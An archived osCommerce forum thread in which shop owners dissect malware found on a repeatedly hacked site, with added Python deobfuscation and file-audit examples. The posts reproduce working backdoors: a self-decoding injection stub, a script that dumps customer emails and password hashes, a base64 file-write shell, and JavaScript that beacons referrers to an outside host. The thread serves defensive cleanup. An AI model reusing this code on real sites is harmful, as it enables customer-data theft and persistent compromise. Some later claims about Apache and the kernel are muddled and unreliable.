deirossiteam Posted August 26, 2010

My application_top file keeps getting attacked. I've set appropriate permissions on the file, I've installed FWR Security Pro and .htaccess protection, and deleted the admin file manager, yet as soon as I clean up the code, it eventually reappears. I have changed the passwords; I should be the only one with access to the site. Here is what the malicious code looks like:

```php
/**start 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 end**/
// Cookie name is the MD5 of the requested host, so every infected site gets its own marker.
$__name = md5($_SERVER['HTTP_HOST']);
// Only Windows user agents are targeted.
$reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)";
// Fire once per visitor: anyone already carrying the cookie is skipped.
if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) {
  $date = date("D, j M Y 00:00:00", time()+60*60*24*30);
  $cookie = time().".".rand(1111111, 9999999);
  // Set a 30-day cookie server-side; fall back to JavaScript if headers were already sent.
  $set_js = @setcookie ($__name, $cookie, time()+60*60*24*30);
  if(!$set_js) echo '<script type="text/javascript">document.cookie = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>';
  // Read this very file, pull whatever sits between '*start' and 'end*' in the comment above,
  // and emit it: base64-decoded if it looks like base64, raw otherwise.
  $__content = file_get_contents(__FILE__);
  preg_match("#\*start(.*?)end\*#is", $__content, $__m);
  if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) {
    echo base64_decode($__m[1]);
  } elseif(isset($__m[1]) and trim($__m[1])!="") {
    echo $__m[1];
  }
}
```

It is normally inserted right after the opening <?php. Any ideas? Anything I should check for? Thanks for your help in advance.
Guest Posted August 26, 2010

Kavon, OK, now that you're in the correct forum: have you made the security changes to your admin files as suggested here? http://www.oscommerce.com/forums/index.php?showtopic=340995 And have you also made the security changes outlined in this thread? http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ If you have completed those changes and still get hacked, then more likely the hacker has a file hidden on the site that allows a backdoor. Check your hosting account for unknown files: files with double extensions (file.html.php) or other anomalies. Chris
deirossiteam (Author) Posted August 26, 2010

I did find a file mhp.php in my catalog/images directory with the following code:

```php
<?php
// Access is gated on a hard-coded MD5 of the 'p' parameter; a wrong or missing key exits silently.
$p=$_REQUEST['p'];
if (!isset($p) || md5($p)!='c180aaadf5ab10fb3a733f43f3ffc4b3') die ('');
// ?d=1 makes the script delete itself.
if ($_REQUEST['d'] == '1') unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);
echo "#mhpver11"."\n"; //mail hash parser oscommerce
// Reuses the shop's own database credentials to dump every customer's e-mail address and password hash.
include "../includes/database_tables.php";
include "../includes/configure.php";
$link = mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die("Could not connect");
mysql_select_db(DB_DATABASE);
$result = mysql_query ("SELECT customers_email_address,customers_password FROM ".TABLE_CUSTOMERS);
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
  $l = $line['customers_email_address'].":".$line['customers_password'];
  // Only rows in osCommerce's hash:salt format are printed.
  if (preg_match("/:[a-f0-9]{32}:[a-f0-9]{2}/i",$l)) echo $l."\n";
}
?>
```

Would this be something aiding the hacker?
♥FWR Media Posted August 26, 2010

People always look to osCommerce when they get hacked, but often it has nothing to do with osCommerce at all. If the host server is vulnerable, the hackers can hack a single site on the server and, once that is achieved, can arbitrarily hack the rest of the sites on the server where permissions allow. Most of the "hack" posts I see on this forum tend to be host related, just my opinion.

Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls; KissMT Dynamic SEO Meta & Canonical Header Tags; KissER Error Handling and Debugging; KissIT Image Thumbnailer; Security Pro - Querystring protection against hackers (a KISS contribution). Please only PM me for paid work.
Guest Posted August 27, 2010

Here is the decode for that top line; maybe someone can tell us what it is.

```html
<script language='JavaScript'>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));
</script>
```

Thanks, Bo
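The stub in the first post reads its own file, pulls the base64 between the `*start` and `end*` markers and echoes the decode; the decode Bo posted is two invocations of the familiar `p,a,c,k,e,d` JavaScript packer. The following Python decoder is an added example and not code from this thread or from osCommerce: it extracts the payload exactly the way the stub does, then reverses the packer by treating every `\w+` token as a base-`a` index into the word list. The PHP file it works on and the packed script embedded in it are constructed here from the code posted above (the `function©` mangling restored to `function(c)`), and all function names are my own.

```python
import base64
import re
from typing import List, Optional

# Call site of the p,a,c,k,e,d packer as seen in the decoded payload:
#   ...return p}('<packed>',<radix>,<count>,'<words>'.split('|'),0,{}))
PACKER_CALL = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\),0,\{\}\)\)"
)


def extract_payload(php_source: str) -> Optional[bytes]:
    r"""Pull the base64 blob out of the '/**start ... end**/' comment.

    Mirrors the stub's own logic: preg_match('#\*start(.*?)end\*#is') followed by
    a base64 charset check before base64_decode(). Returns None when nothing fits.
    """
    m = re.search(r"\*start(.*?)end\*", php_source, re.S)
    if not m:
        return None
    blob = m.group(1).strip()
    if not blob or not re.fullmatch(r"[A-Za-z0-9/+]*={0,2}", blob):
        return None
    return base64.b64decode(blob)


def unpack_one(packed: str, radix: int, words: List[str]) -> str:
    r"""Undo one packer call: each \w+ token is a base-`radix` index into `words`;
    an empty dictionary entry means the token stands for itself."""
    def repl(m):
        tok = m.group(0)
        try:
            idx = int(tok, radix)
        except ValueError:
            return tok
        return words[idx] if idx < len(words) and words[idx] else tok
    return re.sub(r"\b\w+\b", repl, packed)


def unpack_all(js: str) -> List[str]:
    """Return the clear-text script of every packer call found in `js`."""
    out = []
    for m in PACKER_CALL.finditer(js):
        packed = re.sub(r"\\(.)", r"\1", m.group(1))  # drop the JS string escapes
        out.append(unpack_one(packed, int(m.group(2)), m.group(4).split("|")))
    return out


def decode_stub(php_source: str) -> List[str]:
    """Full pipeline: infected PHP source in, list of deobfuscated scripts out."""
    payload = extract_payload(php_source)
    return unpack_all(payload.decode("utf-8", "replace")) if payload else []


# Constructed sample: the packed script Bo posted, with the garbled '(c)' restored.
PACKED_JS = (
    r"""<script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.a(\'<3 b="c://8.7/2/4.5?6=d&2=e&h=j&l=k" i="1" f="1" g="0"></3>\');',22,22,'||search|iframe|index|php|bid|in|accountdebug|document|write|src|http|145|ssl|height|frameborder|refresh|width|back|rect|str'.split('|'),0,{}));"""
    r"""eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.6("<7 8=\'5://2.4.3/9/?a=f&g="+1.e+"\' d=\'0\' b=\'0\' c=\'0\'>");',17,17,'|document|groove01|cc|co|http|write|img|src|images|h|height|border|width|referrer|115|abc'.split('|'),0,{}));</script>"""
)

# Constructed sample of an infected application_top.php: only the stub's first lines.
SAMPLE_PHP = (
    "<?php\n"
    "/**start " + base64.b64encode(PACKED_JS.encode()).decode() + " end**/\n"
    "$__name = md5($_SERVER['HTTP_HOST']);\n"
)

if __name__ == "__main__":
    for script in decode_stub(SAMPLE_PHP):
        print(script)
```

Run against the sample it prints two `document.write` calls: a 1x1 iframe pointing at a `search/index.php` URL on the first domain in the word list, and a 0x0 image on the second domain whose query string carries `document.referrer`, which is how the operator learns which shop served the payload.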
deirossiteam (Author) Posted September 9, 2010

Still having problems :( I've found this code in my product listing module:

```php
<?php
// The chr() chains hide two strings: the GET key spells "get_access", the die() message "Restricte access".
if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115)])) die(chr(82).chr(101).chr(115).chr(116).chr(114).chr(105).chr(99).chr(116).chr(101).chr(32).chr(97).chr(99).chr(99).chr(101).chr(115).chr(115));
// Any POST carrying 'path' and a base64 'update' body overwrites that path with the decoded
// content and exits: a general-purpose file writer that can re-plant the stub after a clean-up.
if(isset($_POST['update']) AND !empty($_POST['path'])) {
  $filename = $_POST['path'];
  $somecontent = base64_decode($_POST['update']);
  if (!$handle = fopen($filename, 'w')) {
    echo "Cannot open file ($filename)";
    exit;
  }
  if (fwrite($handle, $somecontent) === FALSE) {
    echo "Cannot write to file ($filename)";
    exit;
  }
  echo "Success, wrote ".strlen($somecontent)." bytes to file ($filename)";
  fclose($handle);
  exit();
}
?>
```

Thanks!
web-project Posted September 10, 2010

"Most of the "hack" posts I see on this forum tend to be host related, just my opinion." Correct, 100% agree. The majority of web hosts normally have 1,000 websites on the same server and they don't care about website or server security!

Please read this line: Do you want to find all the answers to your questions? Click here. As for the contribution database, it's located here! 8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself. Before installing a contribution or editing/updating/deleting any files, do a full backup; it will save you, and everyone here on the forum, time fixing your issues. Any issues with osCommerce, I am here to help you.
Guest Posted September 12, 2010

If you have a clean backup on your PC, unzip it and compare the files on your PC to the ones on your server. I removed this one from a client's server last week. There were at least 16 infected files. Bo
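Chris's advice (look for unknown files and double extensions) and Bo's (compare the live site against a clean backup) fit in one script. What follows is an added example, not code from this thread or from osCommerce: it hashes both trees, reports files that are new, changed or missing, flags double extensions, and greps the live files for the constructs visible in the three snippets posted above (the `/**start` marker, `base64_decode($_POST...)`, long `chr()` chains, self-deletion via `SCRIPT_FILENAME`, and an `md5($var) != '<32 hex>'` gate). The indicator regexes are mine and only cover what is on this page; the clean and live trees it audits are constructed in temporary directories. It compares SHA-256 digests rather than modification times because, as a later post in this thread reports, the attacker reset file dates after re-infecting.

```python
import hashlib
import os
import re
import shutil
import tempfile
from typing import Dict, List

# Content indicators derived from the malicious code quoted in this thread.
# The regexes are my own, not from any scanner.
SUSPICIOUS = [
    ("self-decoding stub marker", re.compile(r"/\*\*start\b")),
    ("base64 request body written to a caller-chosen path",
     re.compile(r"base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST)")),
    ("string assembled from chr() calls", re.compile(r"(?:chr\(\d+\)\s*\.\s*){4,}chr\(\d+\)")),
    ("script deletes itself on request",
     re.compile(r"unlink\s*\(\s*\$(?:HTTP_SERVER_VARS|_SERVER)\[.SCRIPT_FILENAME.\]")),
    ("md5 of a variable compared to a hard-coded hash",
     re.compile(r"md5\s*\(\s*\$\w+\s*\)\s*!==?\s*'[0-9a-f]{32}'")),
]
# Chris's "file.html.php" hint: a web-content extension immediately followed by .php
DOUBLE_EXT = re.compile(r"\.(?:html?|jpe?g|gif|png|txt)\.php$", re.I)


def manifest(root: str) -> Dict[str, str]:
    """Map every file under root (path relative to root) to its SHA-256 hex digest."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out


def scan_file(path: str) -> List[str]:
    """Return the label of every indicator regex that matches the file's content."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", "replace")
    return [label for label, rx in SUSPICIOUS if rx.search(text)]


def audit(clean_root: str, live_root: str) -> Dict[str, List[str]]:
    """Compare the live tree with a known-clean copy; return the reasons per flagged file."""
    clean, live = manifest(clean_root), manifest(live_root)
    findings: Dict[str, List[str]] = {}
    for rel in sorted(set(clean) | set(live)):
        if rel not in live:
            findings[rel] = ["missing from live site"]
            continue
        reasons = []
        if rel not in clean:
            reasons.append("not in clean backup")
        elif clean[rel] != live[rel]:
            reasons.append("content differs from backup")
        if DOUBLE_EXT.search(rel):
            reasons.append("double extension")
        reasons += scan_file(os.path.join(live_root, rel))
        if reasons:
            findings[rel] = reasons
    return findings


def _write(root: str, rel: str, text: str) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)


def demo() -> Dict[str, List[str]]:
    """Build a constructed clean/live pair modelled on this thread and audit it."""
    clean, live = tempfile.mkdtemp(), tempfile.mkdtemp()
    top = "<?php\n// application_top.php placeholder\n"
    listing = "<?php\n// product_listing.php placeholder\n"
    for root in (clean, live):
        _write(root, "images/logo.gif", "GIF89a")
    _write(clean, "includes/application_top.php", top)
    _write(clean, "includes/modules/product_listing.php", listing)
    # Live tree: stub prepended, file-write backdoor appended, two dropped files.
    _write(live, "includes/application_top.php",
           "<?php\n/**start QUJD end**/\n$__name = md5($_SERVER['HTTP_HOST']);\n" + top[6:])
    _write(live, "includes/modules/product_listing.php", listing +
           "if(isset($_GET[chr(103).chr(101).chr(116).chr(95).chr(97)])) die();\n"
           "if(isset($_POST['update'])) { $somecontent = base64_decode($_POST['update']); }\n")
    _write(live, "images/mhp.php",
           "<?php $p=$_REQUEST['p']; if (!isset($p) || md5($p)!='c180aaadf5ab10fb3a733f43f3ffc4b3') die('');\n"
           "if ($_REQUEST['d'] == '1') unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);\n")
    _write(live, "images/promo.html.php", "<?php echo 'promo'; ?>\n")
    try:
        return audit(clean, live)
    finally:
        shutil.rmtree(clean)
        shutil.rmtree(live)


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

Point `audit()` at the unpacked backup and the downloaded webroot; anything reported as "not in clean backup" or "content differs" has to be explained before the site goes back online, and an unchanged file that still trips an indicator means the backup itself is not clean.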
WeWatch Posted September 15, 2010

It deobfuscates to this:

```javascript
document.write("<img src='http://groove01.co.cc/images/?h=65&abc="+document.referrer+"' width='0' height='0' border='0'>");
```

We Watch Your Website - so you don't have to!
♥mdtaylorlrim Posted September 15, 2010

"Still having problems :(" My opinion is to stop this nonsense of trying to clean out individual files. You will likely never find them all. Do you have a clean backup? If so, then simply wipe your site clean. And I mean clean. Get your host to help if you need to, because you can have hidden files not displayed by FTP programs. Then PASSWORD PROTECT THE DIRECTORY. That way, only you can access the files while you work on it. Then restore your backup files. They are clean, right? Then do all those security necessities. ALL OF THEM. Only then remove the password on the root directory and make your shop visible to the world. You can keep searching for the 'back door' if you want, but you may never find it. With a known good backup you will be back up in a day, and any further successful hacks would almost surely be attributable to the host.

Community Bootstrap Edition, Edge. Avoid the most asked question. See How to Secure My Site and How do I...?
Guest Posted September 15, 2010

Yes, it is the answer some of the time, but if the bug is on the server side you have just wasted your time.
♥mdtaylorlrim Posted September 15, 2010

"Yes, it is the answer some of the time, but if the bug is on the server side you have just wasted your time." No, you have positively identified it as a host problem, and now you can confront them to secure the server or lose your business. You cannot afford to continue doing business with them if their server allows someone to hack into your site. Am I correct?
Guest Posted September 15, 2010

All is well with me; mine is secure and I have had no break-ins, but others are not so lucky. If I am working on someone's, I usually prefer to find the problem and figure out how they got in. Besides, half the people with a bug don't have an up-to-date backup in play to work with. I have plenty of backups and redirects if needed. Just saying some people don't have the option. Bo
guigs Posted September 21, 2010

I have the same problem as described in comment #6 (the code found in the product listing module). Have you found the cause of this security problem?
cannuck1964 Posted September 22, 2010

The server may have been hacked. This generally means that there are shell scripts on the server which will just redo the back door when you have removed the affected code. This also means that the server is compromised and, depending on the severity, can mean that the entire kernel is as well. I have gone through this before, and it is a huge headache. Generally you can delete to your heart's content, restore backups and everything else mentioned here, but due to the compromise the hack will just reappear. I have seen files with the exact same code modified (removed the offending code), then half an hour later the code reappears and the file date is set to two years previously. Thus no file tracking on date changes was seen. This occurred over and over, even after removal of all of the code from the site. Recently an exploit has been found that servers (Apache) must be updated to block, else the server will always be compromised and, until it is rebuilt from a new install, will never be removed. cheers

Peter McGrath
-----------------------------
See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
cannuck1964 Posted September 22, 2010

A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel. This vulnerability was found to affect a significant number of servers. CentOS has released a new kernel that includes a patch for this exploit. There is currently no way to patch a server that has already been exploited. If this patch is not applied and the server is exploited, the server will need to be re-imaged and content restored from backups. This is a report on the issue and its severity. For details about the exploit: https://access.redhat.com/kb/docs/DOC-40265 For details about the patch: https://rhn.redhat.com/errata/RHSA-2010-0704.html cheers and hope this helps, Peter McGrath
Dennisra Posted September 22, 2010

Would you be more specific about this? "Recently an exploit has been found that servers (Apache) must be updated to block, else the server will always be compromised and until is rebuilt from a new install will never be removed." cheers
cannuck1964 Posted September 22, 2010

"Would you be more specific about this?" Not sure what you mean; there is a new release for the kernel that needs to be applied. You can read more about this at the links found above. cheers, Peter McGrath
Dennisra Posted September 22, 2010

The links are for the Red Hat Enterprise Linux operating system. You mention Apache Web Server that "must be updated". Which version of Apache are you talking about? What specific vulnerability puts osCommerce at risk? cheers
cannuck1964 Posted September 22, 2010

"The links are for Red Hat Enterprise Linux operating system." Correct. I use Red Hat on my servers, and this is related to me, but then many servers out there use the exact same set-up. "You mention Apache Web Server that "must be updated". Which version of Apache are you talking about? What specific vulnerability puts osCommerce at risk?" A local privilege escalation kernel exploit has been reported that affects 64-bit versions of the Red Hat Enterprise Linux kernel as shipped with the CentOS 5 variant of this kernel. This does not just put osCommerce at risk; rather, it puts the entire domain/server at risk. Because osCommerce is an e-commerce platform, such sites are targeted more than a site that is an information portal only (no sense harvesting from a site that does not really take personal information). But this is a kernel issue and not just related to osCommerce and the site being hacked over and over. Peter McGrath
Dennisra Posted September 22, 2010

I am failing somehow to get through to you. I'll be as plain as I can. I know the Red Hat operating system is vulnerable; that's not the point. I would like to know which APACHE WEB SERVER version you are talking about in your original post that needs updating: "Recently an exploit has been found that servers (Apache) must be updated to block". Thank you.
cannuck1964 Posted September 22, 2010

"I'll be as plain as I can. I know Red Hat operating system is vulnerable, that's not the point." This is the point. "I would like to know which APACHE WEB SERVER version are you talking about in your original post that needs updating?" Red Hat runs using APACHE WEB SERVER. Many versions of WEB SERVERS are out there; if based on Linux then all use the APACHE WEB SERVER. APACHE and Linux are not the same thing. Apache is like a plug-in to the server; it allows the kernel to operate as a server. Linux would still work fine without Apache, it just would not act as a server, is all. So, if your server is using Red Hat AND is based on 64-bit AND uses the CentOS 5 variant, THEN your server needs to be updated. This may also be an issue with Ubuntu, SUSE or other Linux releases which may be based on the CentOS 5 Apache release (or others that may have the same vulnerability). cheers, Peter McGrath
Dennisra Posted September 22, 2010

Yes, of course. You are simply stating the obvious (however, some of it is incorrect, but I am not going there) but failing to answer the one question I keep asking time and time again. I think it's prudent that I just give up at this point. Have a good day!
Archived
This topic is now archived and is closed to further replies.